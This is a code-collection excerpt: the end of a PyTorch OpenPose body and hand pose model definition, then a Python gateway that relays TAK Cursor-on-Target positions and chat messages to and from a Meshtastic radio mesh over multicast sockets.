no_relu_layers = ['conv5_5_CPM_L1', 'conv5_5_CPM_L2', 'Mconv7_stage2_L1',\
'Mconv7_stage2_L2', 'Mconv7_stage3_L1', 'Mconv7_stage3_L2',\
'Mconv7_stage4_L1', 'Mconv7_stage4_L2', 'Mconv7_stage5_L1',\
'Mconv7_stage5_L2', 'Mconv7_stage6_L1', 'Mconv7_stage6_L1']
blocks = {}
block0 = OrderedDict([
('conv1_1', [3, 64, 3, 1, 1]),
('conv1_2', [64, 64, 3, 1, 1]),
('pool1_stage1', [2, 2, 0]),
('conv2_1', [64, 128, 3, 1, 1]),
('conv2_2', [128, 128, 3, 1, 1]),
('pool2_stage1', [2, 2, 0]),
('conv3_1', [128, 256, 3, 1, 1]),
('conv3_2', [256, 256, 3, 1, 1]),
('conv3_3', [256, 256, 3, 1, 1]),
('conv3_4', [256, 256, 3, 1, 1]),
('pool3_stage1', [2, 2, 0]),
('conv4_1', [256, 512, 3, 1, 1]),
('conv4_2', [512, 512, 3, 1, 1]),
('conv4_3_CPM', [512, 256, 3, 1, 1]),
('conv4_4_CPM', [256, 128, 3, 1, 1])
])
# Stage 1
block1_1 = OrderedDict([
('conv5_1_CPM_L1', [128, 128, 3, 1, 1]),
('conv5_2_CPM_L1', [128, 128, 3, 1, 1]),
('conv5_3_CPM_L1', [128, 128, 3, 1, 1]),
('conv5_4_CPM_L1', [128, 512, 1, 1, 0]),
('conv5_5_CPM_L1', [512, 38, 1, 1, 0])
])
block1_2 = OrderedDict([
('conv5_1_CPM_L2', [128, 128, 3, 1, 1]),
('conv5_2_CPM_L2', [128, 128, 3, 1, 1]),
('conv5_3_CPM_L2', [128, 128, 3, 1, 1]),
('conv5_4_CPM_L2', [128, 512, 1, 1, 0]),
('conv5_5_CPM_L2', [512, 19, 1, 1, 0])
])
blocks['block1_1'] = block1_1
blocks['block1_2'] = block1_2
self.model0 = make_layers(block0, no_relu_layers)
# Stages 2 - 6
for i in range(2, 7):
blocks['block%d_1' % i] = OrderedDict([
('Mconv1_stage%d_L1' % i, [185, 128, 7, 1, 3]),
('Mconv2_stage%d_L1' % i, [128, 128, 7, 1, 3]),
('Mconv3_stage%d_L1' % i, [128, 128, 7, 1, 3]),
('Mconv4_stage%d_L1' % i, [128, 128, 7, 1, 3]),
('Mconv5_stage%d_L1' % i, [128, 128, 7, 1, 3]),
('Mconv6_stage%d_L1' % i, [128, 128, 1, 1, 0]),
('Mconv7_stage%d_L1' % i, [128, 38, 1, 1, 0])
])
blocks['block%d_2' % i] = OrderedDict([
('Mconv1_stage%d_L2' % i, [185, 128, 7, 1, 3]),
('Mconv2_stage%d_L2' % i, [128, 128, 7, 1, 3]),
('Mconv3_stage%d_L2' % i, [128, 128, 7, 1, 3]),
('Mconv4_stage%d_L2' % i, [128, 128, 7, 1, 3]),
('Mconv5_stage%d_L2' % i, [128, 128, 7, 1, 3]),
('Mconv6_stage%d_L2' % i, [128, 128, 1, 1, 0]),
('Mconv7_stage%d_L2' % i, [128, 19, 1, 1, 0])
])
for k in blocks.keys():
blocks[k] = make_layers(blocks[k], no_relu_layers)
self.model1_1 = blocks['block1_1']
self.model2_1 = blocks['block2_1']
self.model3_1 = blocks['block3_1']
self.model4_1 = blocks['block4_1']
self.model5_1 = blocks['block5_1']
self.model6_1 = blocks['block6_1']
self.model1_2 = blocks['block1_2']
self.model2_2 = blocks['block2_2']
self.model3_2 = blocks['block3_2']
self.model4_2 = blocks['block4_2']
self.model5_2 = blocks['block5_2']
self.model6_2 = blocks['block6_2']
def forward(self, x):
out1 = self.model0(x)
out1_1 = self.model1_1(out1)
out1_2 = self.model1_2(out1)
out2 = torch.cat([out1_1, out1_2, out1], 1)
out2_1 = self.model2_1(out2)
out2_2 = self.model2_2(out2)
out3 = torch.cat([out2_1, out2_2, out1], 1)
out3_1 = self.model3_1(out3)
out3_2 = self.model3_2(out3)
out4 = torch.cat([out3_1, out3_2, out1], 1)
out4_1 = self.model4_1(out4)
out4_2 = self.model4_2(out4)
out5 = torch.cat([out4_1, out4_2, out1], 1)
out5_1 = self.model5_1(out5)
out5_2 = self.model5_2(out5)
out6 = torch.cat([out5_1, out5_2, out1], 1)
out6_1 = self.model6_1(out6)
out6_2 = self.model6_2(out6)
return out6_2,out6_1
class handpose_model(nn.Module):
def __init__(self):
super(handpose_model, self).__init__()
# these layers have no relu layer
no_relu_layers = ['conv6_2_CPM', 'Mconv7_stage2', 'Mconv7_stage3',\
'Mconv7_stage4', 'Mconv7_stage5', 'Mconv7_stage6']
# stage 1
block1_0 = OrderedDict([
('conv1_1', [3, 64, 3, 1, 1]),
('conv1_2', [64, 64, 3, 1, 1]),
('pool1_stage1', [2, 2, 0]),
('conv2_1', [64, 128, 3, 1, 1]),
('conv2_2', [128, 128, 3, 1, 1]),
('pool2_stage1', [2, 2, 0]),
('conv3_1', [128, 256, 3, 1, 1]),
('conv3_2', [256, 256, 3, 1, 1]),
('conv3_3', [256, 256, 3, 1, 1]),
('conv3_4', [256, 256, 3, 1, 1]),
('pool3_stage1', [2, 2, 0]),
('conv4_1', [256, 512, 3, 1, 1]),
('conv4_2', [512, 512, 3, 1, 1]),
('conv4_3', [512, 512, 3, 1, 1]),
('conv4_4', [512, 512, 3, 1, 1]),
('conv5_1', [512, 512, 3, 1, 1]),
('conv5_2', [512, 512, 3, 1, 1]),
('conv5_3_CPM', [512, 128, 3, 1, 1])
])
block1_1 = OrderedDict([
('conv6_1_CPM', [128, 512, 1, 1, 0]),
('conv6_2_CPM', [512, 22, 1, 1, 0])
])
blocks = {}
blocks['block1_0'] = block1_0
blocks['block1_1'] = block1_1
# stage 2-6
for i in range(2, 7):
blocks['block%d' % i] = OrderedDict([
('Mconv1_stage%d' % i, [150, 128, 7, 1, 3]),
('Mconv2_stage%d' % i, [128, 128, 7, 1, 3]),
('Mconv3_stage%d' % i, [128, 128, 7, 1, 3]),
('Mconv4_stage%d' % i, [128, 128, 7, 1, 3]),
('Mconv5_stage%d' % i, [128, 128, 7, 1, 3]),
('Mconv6_stage%d' % i, [128, 128, 1, 1, 0]),
('Mconv7_stage%d' % i, [128, 22, 1, 1, 0])
])
for k in blocks.keys():
blocks[k] = make_layers(blocks[k], no_relu_layers)
self.model1_0 = blocks['block1_0']
self.model1_1 = blocks['block1_1']
self.model2 = blocks['block2']
self.model3 = blocks['block3']
self.model4 = blocks['block4']
self.model5 = blocks['block5']
self.model6 = blocks['block6']
def forward(self, x):
out1_0 = self.model1_0(x)
out1_1 = self.model1_1(out1_0)
concat_stage2 = torch.cat([out1_1, out1_0], 1)
out_stage2 = self.model2(concat_stage2)
concat_stage3 = torch.cat([out_stage2, out1_0], 1)
out_stage3 = self.model3(concat_stage3)
concat_stage4 = torch.cat([out_stage3, out1_0], 1)
out_stage4 = self.model4(concat_stage4)
concat_stage5 = torch.cat([out_stage4, out1_0], 1)
out_stage5 = self.model5(concat_stage5)
concat_stage6 = torch.cat([out_stage5, out1_0], 1)
out_stage6 = self.model6(concat_stage6)
return out_stage6
| 15,939 | Python | .py | 338 | 32.41716 | 90 | 0.446962 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,116 | tak_meshtastic_gateway.py | brian7704_TAK_Meshtastic_Gateway/tak_meshtastic_gateway/tak_meshtastic_gateway.py | import argparse
import sys
import traceback
from tak_meshtastic_gateway.dm_socket_thread import DMSocketThread
from bs4 import BeautifulSoup
from xml.etree.ElementTree import Element, SubElement, tostring
from meshtastic import portnums_pb2, mesh_pb2, atak_pb2, protocols
import meshtastic.serial_interface
import meshtastic.tcp_interface
from pubsub import pub
import datetime
import socket
import takproto
import time
import select
import colorlog
import logging
import unishox2
import uuid
import base64
import netifaces
import ipaddress
import platform
# Outputs
chat_out = ("224.10.10.1", 17012)
sa_multicast_out = ("239.2.3.1", 6969)
# Inputs
chat_in = ("224.10.10.1", 17012) # UDP
default_in = ("0.0.0.0", 4242) # UDP
default_in_tcp = ("0.0.0.0", 4242) # TCP
prc_152 = ("0.0.0.0", 10001) # UDP
request_notify = ("0.0.0.0", 8087) # TCP
route_management = ("0.0.0.0", 8087) # UDP
sa_multicast_in = ("239.2.3.1", 6969) # UDP
sa_multicast_sensor_data_in = ("239.5.5.55", 7171) # UDP
class TAKMeshtasticGateway:
def __init__(self, ip=None, serial_device=None, mesh_ip=None, tak_client_ip="localhost", tx_interval=30,
dm_port=4243, log_file=None, debug=False):
self.meshtastic_devices = {}
self.node_names = {}
self.tak_client = {}
self.chat_sock = None
self.sa_multicast_sock = None
self.ip = ip
self.dm_port = dm_port
self.serial_device = serial_device
self.mesh_ip = mesh_ip
self.tak_client_ip = tak_client_ip
self.tx_interval = tx_interval
self.log_file = log_file
self.log_level = logging.DEBUG if debug else logging.INFO
self.interface = None
self.meshtastic_connected = False
self.meshtastic_device_info = None
self.socket_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket_client.connect((tak_client_ip, 4242))
color_log_handler = colorlog.StreamHandler()
color_log_formatter = colorlog.ColoredFormatter(
'%(log_color)s[%(asctime)s] - TAK Meshtastic Gateway[%(process)d] - %(module)s - %(funcName)s - %(lineno)d - %(levelname)s - %(message)s',
datefmt="%Y-%m-%d %H:%M:%S")
color_log_handler.setFormatter(color_log_formatter)
self.logger = colorlog.getLogger('TAK Meshtastic Gateway')
self.logger.setLevel(self.log_level)
self.logger.addHandler(color_log_handler)
self.logger.propagate = False
if self.log_file:
try:
fh = logging.FileHandler(self.log_file)
fh.setLevel(self.log_level)
fh.setFormatter(logging.Formatter(
"[%(asctime)s] - TAK Meshtastic Gateway[%(process)d] - %(module)s - %(funcName)s - %(lineno)d - %(levelname)s - %(message)s"))
self.logger.addHandler(fh)
except BaseException as e:
self.logger.error(f"Failed to add log file handler: {e}")
sys.exit()
pub.subscribe(self.on_receive, "meshtastic.receive")
pub.subscribe(self.on_connection, "meshtastic.connection.established")
pub.subscribe(self.on_connection_lost, "meshtastic.connection.established.lost")
self.connect_to_meshtastic_node()
self.dm_sock = DMSocketThread(self.logger, self.interface)
def connect_to_meshtastic_node(self):
if self.mesh_ip:
self.interface = meshtastic.tcp_interface.TCPInterface(self.mesh_ip)
else:
self.interface = meshtastic.serial_interface.SerialInterface(self.serial_device)
def cot(self, pb, from_id, to_id, portnum, how='m-g', cot_type='a-f-G-U-C', uid=None):
if not uid and from_id in self.meshtastic_devices and self.meshtastic_devices[from_id]['uid']:
uid = self.meshtastic_devices[from_id]['uid']
elif not uid:
uid = from_id
now = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
stale = (datetime.datetime.now() + datetime.timedelta(days=1)).strftime("%Y-%m-%dT%H:%M:%SZ")
event = Element('event', {'how': how, 'type': cot_type, 'version': '2.0',
'uid': uid, 'start': now, 'time': now, 'stale': stale})
SubElement(event, 'point', {'ce': '9999999.0', 'le': '9999999.0',
'hae': str(self.meshtastic_devices[from_id]['last_alt']),
'lat': str(self.meshtastic_devices[from_id]['last_lat']),
'lon': str(self.meshtastic_devices[from_id]['last_lon'])})
detail = SubElement(event, 'detail')
if portnum == "TEXT_MESSAGE_APP" or (portnum == "ATAK_PLUGIN" and pb.HasField('chat')):
return event, detail
else:
SubElement(detail, 'takv', {'device': self.meshtastic_devices[from_id]['hw_model'],
'version': self.meshtastic_devices[from_id]['firmware_version'],
'platform': 'Meshtastic', 'os': 'Meshtastic',
'macaddr': self.meshtastic_devices[from_id]['macaddr'],
'meshtastic_id': self.meshtastic_devices[from_id]['meshtastic_id']})
SubElement(detail, 'contact',{'callsign': self.meshtastic_devices[from_id]['long_name'], 'endpoint': f'{self.ip}:{self.dm_port}:tcp'})
SubElement(detail, 'uid', {'Droid': self.meshtastic_devices[from_id]['long_name']})
SubElement(detail, 'precisionlocation', {'altsrc': 'GPS', 'geopointsrc': 'GPS'})
SubElement(detail, 'status', {'battery': str(self.meshtastic_devices[from_id]['battery'])})
SubElement(detail, 'track', {'course': '0.0', 'speed': '0.0'})
SubElement(detail, '__group', {'name': self.meshtastic_devices[from_id]['team'],
'role': self.meshtastic_devices[from_id]['role']})
return event
def position(self, pb, from_id, to_id, portnum):
try:
self.meshtastic_devices[from_id]['last_lat'] = pb.latitude_i * .0000001
self.meshtastic_devices[from_id]['last_lon'] = pb.longitude_i * .0000001
self.meshtastic_devices[from_id]['last_alt'] = pb.altitude
if portnum == portnums_pb2.PortNum.POSITION_APP:
self.meshtastic_devices[from_id]['course'] = pb.ground_track if pb.ground_track else "0.0"
self.meshtastic_devices[from_id]['speed'] = pb.ground_speed if pb.ground_speed else "0.0"
return self.cot(pb, from_id, to_id, portnum)
except BaseException as e:
self.logger.error("Failed to create CoT: {}".format(str(e)))
self.logger.error(traceback.format_exc())
return
def text_message(self, pb, from_id, to_id, portnum):
callsign = from_id
if from_id in self.meshtastic_devices:
callsign = self.meshtastic_devices[from_id]['long_name']
self.logger.debug(self.meshtastic_devices)
to_id = f"!{to_id:08x}"
chatroom = "All Chat Rooms"
self.logger.debug(f"to_id: {to_id} mesh id: {self.meshtastic_device_info['user']['id']}")
if str(to_id) == str(self.meshtastic_device_info['user']['id']) and self.tak_client:
chatroom = self.tak_client['uid']
self.logger.debug(f"Chatroom is {chatroom}")
if from_id in self.meshtastic_devices and self.meshtastic_devices[from_id]['uid']:
from_uid = self.meshtastic_devices[from_id]['uid']
else:
from_uid = from_id
message_uid = str(uuid.uuid4())
event, detail = self.cot(pb, from_uid, chatroom, portnum, how='h-g-i-g-o', cot_type='b-t-f',
uid="GeoChat.{}.{}.{}".format(from_uid, chatroom, message_uid))
chat = SubElement(detail, '__chat',
{'chatroom': chatroom, 'groupOwner': "false", 'id': chatroom,
'messageId': message_uid, 'parent': 'RootContactGroup',
'senderCallsign': callsign})
SubElement(chat, 'chatgrp', {'id': chatroom, 'uid0': from_uid, 'uid1': chatroom})
SubElement(detail, 'link', {'relation': 'p-p', 'type': 'a-f-G-U-C', 'uid': from_uid})
remarks = SubElement(detail, 'remarks', {'source': 'BAO.F.ATAK.{}'.format(from_uid),
'time': datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ"),
'to': chatroom})
remarks.text = pb.decode('utf-8', 'replace')
return event
def node_info(self, pb, from_id, to_id, portnum):
if portnum == "ATAK_PLUGIN":
if pb.is_compressed:
uid = unishox2.decompress(pb.contact.device_callsign, len(pb.contact.device_callsign))
else:
uid = pb.contact.device_callsign
self.meshtastic_devices[from_id]['uid'] = uid
if pb.is_compressed:
self.meshtastic_devices[from_id]['long_name'] = unishox2.decompress(pb.contact.callsign,
len(pb.contact.callsign))
else:
self.meshtastic_devices[from_id]['long_name'] = pb.contact.callsign
self.meshtastic_devices[from_id]['short_name'] = uid[-4:]
self.meshtastic_devices[from_id]['battery'] = pb.status.battery
if pb.group.team != 0:
self.meshtastic_devices[from_id]['team'] = atak_pb2.Team.Name(pb.group.team)
if pb.group.role != 0:
self.meshtastic_devices[from_id]['role'] = atak_pb2.MemberRole.Name(pb.group.role)
return self.cot(pb, uid, to_id, portnum)
else:
hw_model = mesh_pb2.HardwareModel.Name(pb.hw_model)
if hw_model and not self.meshtastic_devices[from_id]['hw_model']:
self.meshtastic_devices[from_id]['hw_model'] = hw_model
if pb.long_name and not self.meshtastic_devices[from_id]['long_name']:
self.meshtastic_devices[from_id]['long_name'] = str(pb.long_name)
if pb.short_name and not self.meshtastic_devices[from_id]['short_name']:
self.meshtastic_devices[from_id]['short_name'] = str(pb.short_name)
if pb.macaddr and not self.meshtastic_devices[from_id]['macaddr']:
self.meshtastic_devices[from_id]['macaddr'] = base64.b64encode(pb.macaddr).decode('ascii')
return self.cot(pb, from_id, to_id, portnum)
def telemetry(self, pb, from_id, to_id, portnum):
if pb.HasField('device_metrics'):
self.meshtastic_devices[from_id]['battery'] = pb.device_metrics.battery_level
self.meshtastic_devices[from_id]['voltage'] = pb.device_metrics.voltage
self.meshtastic_devices[from_id]['uptime'] = pb.device_metrics.uptime_seconds
elif pb.HasField('environment_metrics'):
self.meshtastic_devices[from_id]['temperature'] = pb.environment_metrics.temperature
self.meshtastic_devices[from_id]['relative_humidity'] = pb.environment_metrics.relative_humidity
self.meshtastic_devices[from_id]['barometric_pressure'] = pb.environment_metrics.barometric_pressure
self.meshtastic_devices[from_id]['gas_resistance'] = pb.environment_metrics.gas_resistance
self.meshtastic_devices[from_id]['voltage'] = pb.environment_metrics.voltage
self.meshtastic_devices[from_id]['current'] = pb.environment_metrics.current
self.meshtastic_devices[from_id]['iaq'] = pb.environment_metrics.iaq
def atak_plugin(self, pb, from_id, to_id, portnum):
if pb.HasField('contact') and pb.is_compressed:
uid = unishox2.decompress(pb.contact.device_callsign, len(pb.contact.device_callsign))
callsign = unishox2.decompress(pb.contact.callsign, len(pb.contact.callsign))
elif pb.HasField('contact') and not pb.is_compressed:
uid = pb.contact.device_callsign
callsign = pb.contact.callsign
else:
self.logger.warning("Got an ATAK_PLUGIN packet without the contact field")
self.logger.warning(pb)
return
if uid not in self.meshtastic_devices:
self.meshtastic_devices[uid] = {'hw_model': '', 'long_name': callsign, 'short_name': uid[-4:],
'macaddr': '',
'firmware_version': '', 'last_lat': "0.0", 'last_lon': "0.0",
'meshtastic_id': '',
'battery': 0, 'voltage': 0, 'uptime': 0, 'last_alt': "9999999.0",
'course': '0.0',
'speed': '0.0', 'team': 'Cyan', 'role': 'Team Member', 'uid': uid}
self.node_info(pb, uid, to_id, portnum)
if pb.HasField('status'):
self.meshtastic_devices[uid]['battery'] = pb.status.battery
if pb.HasField('pli'):
self.meshtastic_devices[uid]['last_lat'] = pb.pli.latitude_i * .0000001
self.meshtastic_devices[uid]['last_lon'] = pb.pli.longitude_i * .0000001
self.meshtastic_devices[uid]['last_alt'] = pb.pli.altitude
self.meshtastic_devices[uid]['course'] = pb.pli.course
self.meshtastic_devices[uid]['speed'] = pb.pli.speed
return self.cot(pb, uid, to_id, portnum)
elif pb.HasField('chat'):
if pb.is_compressed:
to = unishox2.decompress(pb.chat.to, len(pb.chat.to))
message = unishox2.decompress(pb.chat.message, len(pb.chat.message))
else:
to = pb.chat.to
message = pb.chat.message
self.logger.debug(
"Got chat: {} {}->{}: {}".format(to, from_id, to_id, message))
message_uid = str(uuid.uuid4())
message_uid = "GeoChat.{}.{}.{}".format(uid, to, message_uid)
event, detail = self.cot(pb, uid, to_id, portnum, how='h-g-i-g-o', cot_type='b-t-f', uid=message_uid)
chat = SubElement(detail, '__chat',
{'chatroom': 'All Chat Rooms', 'groupOwner': "false", 'id': to,
'messageId': message_uid, 'parent': 'RootContactGroup',
'senderCallsign': callsign})
SubElement(chat, 'chatgrp', {'id': to, 'uid0': uid, 'uid1': to})
SubElement(detail, 'link', {'relation': 'p-p', 'type': 'a-f-G-U-C', 'uid': uid})
remarks = SubElement(detail, 'remarks', {'source': 'BAO.F.ATAK.{}'.format(uid),
'time': datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ"),
'to': to})
remarks.text = message
return event
def protobuf_to_cot(self, pb, from_id, to_id, portnum):
event = None
if from_id[0] != "!":
from_id = "!" + from_id
if from_id != self.meshtastic_device_info['user']['id'] and from_id not in self.meshtastic_devices:
self.meshtastic_devices[from_id] = {'hw_model': '', 'long_name': '', 'short_name': '', 'macaddr': '',
'firmware_version': '', 'last_lat': "0.0", 'last_lon': "0.0",
'meshtastic_id': from_id,
'battery': 0, 'voltage': 0, 'uptime': 0, 'last_alt': "9999999.0",
'course': '0.0',
'speed': '0.0', 'team': 'Cyan', 'role': 'Team Member', 'uid': None}
self.dm_sock.add_meshtastic_node(from_id)
if portnum == "MAP_REPORT_APP" or (portnum == "POSITION_APP" and pb.latitude_i):
event = self.position(pb, from_id, to_id, portnum)
elif portnum == "NODEINFO_APP":
event = self.node_info(pb, from_id, to_id, portnum)
elif portnum == "TEXT_MESSAGE_APP":
event = self.text_message(pb, from_id, to_id, portnum)
elif portnum == "ATAK_PLUGIN":
event = self.atak_plugin(pb, from_id, to_id, portnum)
elif portnum == "TELEMETRY_APP":
self.telemetry(pb, from_id, to_id, portnum)
try:
if event is not None:
self.logger.debug(f"Sending {tostring(event)}")
self.socket_client.send(tostring(event))
except BaseException as e:
self.logger.error(str(e))
self.logger.error(traceback.format_exc())
def on_receive(self, packet, interface): # called when a packet arrives
from_id = packet['from']
from_id = f"!{from_id:08x}"
# Ignore messages sent from this Meshtastic device
if from_id == self.meshtastic_device_info['user']['id']:
return
to_id = packet['to']
self.logger.debug(packet)
if 'decoded' not in packet:
return
self.logger.info(f"Got a message from {from_id}")
pn = packet['decoded']['portnum']
handler = protocols.get(portnums_pb2.PortNum.Value(packet['decoded']['portnum']))
if handler is None:
if packet['decoded']['portnum'] == "ATAK_PLUGIN":
try:
tak_packet = atak_pb2.TAKPacket()
tak_packet.ParseFromString(packet['decoded']['payload'])
self.logger.debug(tak_packet)
self.protobuf_to_cot(tak_packet, from_id, to_id, pn)
except BaseException as e:
self.logger.debug(f"Failed to decode ATAK_PLUGIN protobuf: {e}")
return
if handler.protobufFactory is None:
self.protobuf_to_cot(packet['decoded']['payload'], from_id, to_id, pn)
else:
try:
pb = handler.protobufFactory()
pb.ParseFromString(packet['decoded']['payload'])
if pn == portnums_pb2.PortNum.NODEINFO_APP:
self.node_names[from_id] = pb.long_name
self.logger.debug(pb)
self.protobuf_to_cot(pb, from_id, to_id, pn)
except:
self.logger.error(traceback.format_exc())
def on_connection(self, interface, topic=pub.AUTO_TOPIC):
self.logger.info("Connected to the Meshtastic Device")
self.meshtastic_connected = True
self.meshtastic_device_info = interface.getMyNodeInfo()
self.logger.debug(self.meshtastic_device_info)
nodes = interface.nodes
self.logger.debug(nodes)
for node in nodes:
if interface.nodes[node] != self.meshtastic_device_info:
self.meshtastic_devices[node] = {'hw_model': nodes[node]['user']['hwModel'], 'long_name': nodes[node]['user']['longName'],
'short_name': nodes[node]['user']['shortName'], 'macaddr': '',
'firmware_version': '', 'last_lat': "0.0", 'last_lon': "0.0",
'meshtastic_id': node, 'battery': 0, 'voltage': 0, 'uptime': 0,
'last_alt': "9999999.0", 'course': '0.0', 'speed': '0.0', 'team': 'Cyan',
'role': 'Team Member', 'uid': node}
self.dm_sock.add_meshtastic_node(node)
self.logger.debug(self.meshtastic_devices)
def on_connection_lost(self, interface):
self.logger.error("Lost connection to the Meshtastic device, attempting to reconnect...")
self.meshtastic_connected = False
self.connect_to_meshtastic_node()
def main(self):
for interface in netifaces.interfaces():
if self.ip:
break
addresses = netifaces.ifaddresses(interface)
for address in addresses:
try:
ip = ipaddress.IPv4Address(addresses[address][0]['addr'])
if ip.is_private and not ip.is_loopback and not ip.is_multicast:
self.ip = str(ip)
self.logger.info(f"Your IP address is {self.ip}")
break
except ValueError:
self.logger.debug(f"{addresses[address][0]['addr']} is not an IPv4 address")
self.logger.debug(f"The system platform is {platform.system()}")
self.chat_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
if platform.system() == 'Windows':
self.chat_sock.bind((self.ip, chat_in[1]))
self.chat_sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.inet_aton(self.ip))
self.chat_sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(chat_in[0]) + socket.inet_aton(self.ip))
else:
self.chat_sock.bind(chat_in)
self.chat_sock.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_IF, socket.inet_aton(self.ip))
self.chat_sock.setsockopt(socket.SOL_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(chat_in[0]) + socket.inet_aton(self.ip))
self.sa_multicast_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.sa_multicast_sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
if platform.system() == 'Windows':
self.sa_multicast_sock.bind((self.ip, sa_multicast_in[1]))
self.sa_multicast_sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.inet_aton(self.ip))
self.sa_multicast_sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(sa_multicast_in[0]) + socket.inet_aton(self.ip))
else:
self.sa_multicast_sock.bind(sa_multicast_in)
self.sa_multicast_sock.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_IF, socket.inet_aton(self.ip))
self.sa_multicast_sock.setsockopt(socket.SOL_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(sa_multicast_in[0]) + socket.inet_aton(self.ip))
self.dm_sock.start()
while True:
data = None
try:
inputready, outputready, exceptready = select.select([self.chat_sock, self.sa_multicast_sock], [], [])
for s in inputready:
data, sender = s.recvfrom(4096)
# Only accept multicast data from one TAK client
if sender[0] != self.ip and sender[0] != self.tak_client_ip:
self.logger.warning(f"Got data from {sender[0]}, ignoring")
continue
except KeyboardInterrupt:
self.logger.info("Exiting....")
self.dm_sock.stop()
self.interface.close()
break
if data:
self.logger.debug(data)
parsed_data = takproto.parse_proto(data)
if not parsed_data:
parsed_data = takproto.parse_proto(takproto.xml2proto(data.decode('utf-8')))
if not parsed_data:
self.logger.warning(f"Failed to parse data: {data}")
continue
if parsed_data and parsed_data.cotEvent.type == 'b-t-f':
xml = "<detail>" + parsed_data.cotEvent.detail.xmlDetail + "</detail>"
soup = BeautifulSoup(xml, 'xml')
chat = soup.find("__chat")
chatroom = chat.attrs['chatroom']
sender_callsign = chat.attrs['senderCallsign']
chat_group = chat.find("chatgrp")
sender_uid = chat_group.attrs['uid0']
receiver_uid = chat_group.attrs['uid1']
remarks = soup.find("remarks")
message = remarks.text
if chatroom == "All Chat Rooms":
# Send as a Meshtastic text message so both the Meshtastic app and ATAK Plugin will receive it
self.interface.sendText(message)
self.logger.info("Sent text message to Meshtastic")
else:
tak_packet = atak_pb2.TAKPacket()
tak_packet.is_compressed = True
tak_packet.contact.callsign, size = unishox2.compress(sender_callsign)
tak_packet.contact.device_callsign, size = unishox2.compress(sender_uid)
tak_packet.group.team = self.tak_client['group_name']
tak_packet.group.role = self.tak_client['group_role']
tak_packet.status.battery = self.tak_client['battery']
tak_packet.chat.message, size = unishox2.compress(message)
tak_packet.chat.to = receiver_uid
self.interface.sendData(tak_packet, portNum=portnums_pb2.PortNum.ATAK_PLUGIN)
self.logger.info("Sent ATAK GeoChat to Meshtastic")
elif parsed_data:
uid = parsed_data.cotEvent.uid
if not uid:
continue
if not self.tak_client:
self.tak_client = {'lat': parsed_data.cotEvent.lat, 'lon': parsed_data.cotEvent.lon,
'hae': parsed_data.cotEvent.hae, 'uid': uid,
'ce': parsed_data.cotEvent.ce, 'le': parsed_data.cotEvent.le,
'callsign': '', 'device': '', 'platform': '', 'os': '', 'version': '',
'group_name': '', 'group_role': '',
'course': 0, 'speed': 0, 'battery': 0, 'last_tx_time': 0}
self.logger.debug(self.tak_client)
else:
self.tak_client['lat'] = parsed_data.cotEvent.lat
self.tak_client['lon'] = parsed_data.cotEvent.lon
self.tak_client['hae'] = parsed_data.cotEvent.hae
self.tak_client['ce'] = parsed_data.cotEvent.ce
self.tak_client['le'] = parsed_data.cotEvent.le
if parsed_data.cotEvent.detail.HasField("contact"):
contact = parsed_data.cotEvent.detail.contact
if not self.tak_client['callsign']:
self.tak_client['callsign'] = contact.callsign
self.interface.localNode.setOwner(f"{contact.callsign} Mesh Node", uid[-4:])
if parsed_data.cotEvent.detail.HasField("takv"):
takv = parsed_data.cotEvent.detail.takv
self.tak_client['device'] = takv.device
self.tak_client['platform'] = takv.platform
self.tak_client['os'] = takv.os
self.tak_client['version'] = takv.version
if parsed_data.cotEvent.detail.HasField("group"):
group = parsed_data.cotEvent.detail.group
self.tak_client['group_name'] = group.name
self.tak_client['group_role'] = group.role
if parsed_data.cotEvent.detail.HasField("track"):
self.tak_client['course'] = parsed_data.cotEvent.detail.track.course
self.tak_client['speed'] = parsed_data.cotEvent.detail.track.speed
if parsed_data.cotEvent.detail.HasField("status"):
self.tak_client['battery'] = parsed_data.cotEvent.detail.status.battery
if time.time() - self.tak_client['last_tx_time'] >= self.tx_interval:
if self.meshtastic_connected:
# Send as a Meshtastic protobuf to show up in the Meshtastic app
self.logger.info("Sending position to Meshtastic")
self.interface.sendPosition(latitude=parsed_data.cotEvent.lat,
longitude=parsed_data.cotEvent.lon,
altitude=parsed_data.cotEvent.hae)
# Send as a TAKPacket to show up in ATAK
atak_packet = atak_pb2.TAKPacket()
if self.tak_client['group_name']:
atak_packet.group.team = self.tak_client['group_name'].replace(" ", "_")
if self.tak_client['group_role']:
atak_packet.group.role = self.tak_client['group_role'].replace(" ", "")
atak_packet.status.battery = self.tak_client['battery']
pli = atak_pb2.PLI()
pli.latitude_i = int(self.tak_client['lat'] / .0000001)
pli.longitude_i = int(self.tak_client['lon'] / .0000001)
pli.altitude = int(self.tak_client['hae'])
pli.speed = int(self.tak_client['speed'])
pli.course = int(self.tak_client['course'])
atak_packet.pli.CopyFrom(pli)
contact = atak_pb2.Contact()
contact.callsign = self.tak_client['callsign'].encode()
contact.device_callsign = uid.encode()
atak_packet.contact.CopyFrom(contact)
if self.meshtastic_connected:
self.interface.sendData(atak_packet, portNum=portnums_pb2.PortNum.ATAK_PLUGIN)
self.tak_client['last_tx_time'] = time.time()
self.logger.info("Sent ATAK packet to Meshtastic")
self.logger.debug(atak_packet)
else:
self.logger.debug("Not sending packet to Meshtastic")
def main():
parser = argparse.ArgumentParser(
prog='TAK Meshtastic Gateway',
description='Listens for multicast messages from TAK clients and forwards them to a Meshtastic network and vice-versa')
parser.add_argument('-i', '--ip-address', help='Network interface to listen on for multicast messages',
default=None)
